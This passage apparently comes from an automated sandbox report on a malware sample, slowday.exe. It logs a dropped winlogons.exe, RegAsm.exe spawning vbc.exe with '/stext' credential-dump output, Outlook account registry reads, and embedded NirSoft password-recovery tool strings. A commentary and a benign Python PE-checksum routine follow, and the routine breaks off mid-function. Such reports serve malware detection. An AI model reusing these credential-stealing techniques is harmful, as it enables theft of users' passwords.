            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_07EE0C02 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_07EE0BCB AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\18da55c1-2652-5cda-252b-e5d7f7077c5d
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E23C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\2132e5f5-d8d3-4986-a43e-f587e2be7b15
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeMutant created: \Sessions\1\BaseNamedObjects\MdmDiagnosticsTool
            Source: 0.3.slowday.exe.3b50000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: slowday.exeStatic file information: File size 2010624 > 1048576
            Source: slowday.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x122600
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: slowday.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: slowday.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DE8AC5 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00DD497D push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00DD9127 push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAC5D0 push ebp; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FABE4C push 8BFFFFFFh; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444975 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00448E74 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0042CF44 push ebx; retf 0042h
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444975 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00444B90 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00448E74 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0042CF44 push ebx; retf 0042h
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4D94 LoadLibraryA,GetProcAddress,
            Source: winlogons.exe.0.drStatic PE information: real checksum: 0xe3e32 should be: 0x1ec7db
            Source: slowday.exeStatic PE information: real checksum: 0xe3e32 should be: 0x1f33e6
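The two checksum rows above say more together than apart: the dropped winlogons.exe and the submitted slowday.exe carry the same stored value (0xe3e32) while their recomputed values differ (0x1ec7db and 0x1f33e6). A mismatch on its own is a weak signal, since the linker only fills in IMAGE_OPTIONAL_HEADER.CheckSum for /RELEASE builds and the loader enforces it only for drivers and a few boot-time components, so plenty of clean user-mode binaries carry zero or a stale value. An identical stored value in two files of different content is the more useful observation: it is consistent with (though not proof of) the same linked stub having had data appended after it was written, which is how compiled AutoIt executables carry their script payload and fits the "Binary is likely a compiled AutoIt script file" verdict in the overview. The Python below is an added example, not code from Joe Sandbox or from the sample; it recomputes the checksum the way imagehlp's CheckSumMappedFile does and compares it with the stored field. The minimal PE image it builds for itself is constructed purely for the test.

```python
"""Recompute a PE image's header checksum and compare it with the stored value.

Added example, not code from Joe Sandbox or from the sample. The algorithm is the
one CheckSumMappedFile implements: a 16-bit end-around-carry sum over the whole
file with the CheckSum field itself skipped, plus the file length. The stub image
built at the bottom is constructed for the test, not taken from the sample."""
import struct


def _checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (0x40 into the optional header)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    off = e_lfanew + 4 + 20 + 0x40  # signature + IMAGE_FILE_HEADER + 0x40
    if off % 4:
        # Assumption: e_lfanew is 4-byte aligned, as every mainstream linker emits it.
        raise ValueError("unaligned NT headers are not handled here")
    return off


def stored_checksum(data: bytes) -> int:
    """The value currently written in the header (what the report calls 'real checksum')."""
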